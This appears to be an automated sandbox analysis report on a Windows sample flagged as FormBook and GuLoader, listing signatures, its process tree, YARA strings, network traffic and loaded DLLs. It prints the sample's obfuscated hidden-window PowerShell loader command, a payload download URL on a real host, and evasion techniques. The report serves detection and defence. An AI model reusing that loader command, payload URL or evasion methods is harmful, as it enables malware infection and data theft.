Windows Analysis Report
PO Tournefortian2453525525235235623425523235.exe

Overview

General Information

Sample name: PO Tournefortian2453525525235235623425523235.exe
Analysis ID: 1483268
MD5: d332bcaa3c61494b774f49bf3e716c21
SHA1: 8cdfa60c6b3f25c7d48753e50c298b746c3386de
SHA256: d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell drops PE file
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • PO Tournefortian2453525525235235623425523235.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe" MD5: D332BCAA3C61494B774F49BF3E716C21)
    • powershell.exe (PID: 6252 cmdline: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • Sammentrykket.exe (PID: 5076 cmdline: "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe" MD5: D332BCAA3C61494B774F49BF3E716C21)
        • RAVCpl64.exe (PID: 7476 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • WerFault.exe (PID: 6404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings)

Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116
  Description: unknown
  Author: unknown
  Strings:
    • 0x8282e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x810dd1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116
  Description: unknown
  Author: unknown
  Strings:
    • 0x8282e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x810dd1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_GuLoader_2
  Description: Yara detected GuLoader
  Author: Joe Security

        System Summary

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", CommandLine: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe", ParentImage: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, ParentProcessId: 1764, ParentProcessName: PO Tournefortian2453525525235235623425523235.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", ProcessId: 6252, ProcessName: powershell.exe
        No Snort rule has matched
Timestamp: 2024-07-26T23:55:52.759567+0200
SID: 2803270
Source Port: 49778
Destination Port: 443
Protocol: TCP
Classtype: Potentially Bad Traffic

        AV Detection

Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, ReversingLabs: Detection: 28%
Source: PO Tournefortian2453525525235235623425523235.exe, ReversingLabs: Detection: 28%
Source: Yara match, File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: PO Tournefortian2453525525235235623425523235.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: PO Tournefortian2453525525235235623425523235.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008B92000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Sammentrykket.exe, Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdb0 source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Code function: 0_2_00406850 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected:
  GET /FPkXcnPDrjTal168.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: villa-ventura.com
  Cache-Control: no-cache
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: villa-ventura.com
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp, String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: PO Tournefortian2453525525235235623425523235.exe, 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO Tournefortian2453525525235235623425523235.exe, 00000000.00000000.76378317578.000000000040A000.00000008.00000001.01000000.00000003.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp, String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000626000.00000020.00000001.01000000.00000008.sdmp, String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester4
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp, String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://villa-ventura.com/
Source: Sammentrykket.exe, 00000004.00000003.77136726603.00000000048A7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.00000000048A7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.bin
Source: Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.binwt?
Source: unknown, Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown, HTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2

        E-Banking Fraud

Source: Yara match, File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created (dropped file): C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Code function: 4_2_209634E0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Code function: 4_2_20962B90 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Code function: 4_2_20962BC0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Code function: 4_2_20962D10 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code functions: 2_2_033C8930, 2_2_033C8060, 2_2_033C7D18, 2_2_07A7BEFE
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Code functions: 4_2_209200A0, 4_2_2093B0D0, 4_2_209E70F1, 4_2_209DE076, 4_2_209351C0, 4_2_2094B1E0, 4_2_2091F113, 4_2_209F010E, 4_2_209CD130, 4_2_2097717A, 4_2_2091D2EC
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/17@1/1
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, File created: C:\Users\user\AppData\Local\efterplaprernes
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5076
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, File created: C:\Users\user\AppData\Local\Temp\nsyDC36.tmp
Source: PO Tournefortian2453525525235235623425523235.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, File read: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
Source: unknown, Process created: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, Sections loaded: edgegdi.dll, uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, wintypes.dll (loaded 3 times), textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Sections loaded: atl.dll, mscoree.dll, edgegdi.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded 2 times), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, urlmon.dll, xmllite.dll, iertutil.dll, srvcli.dll, netutils.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: msi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008B92000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
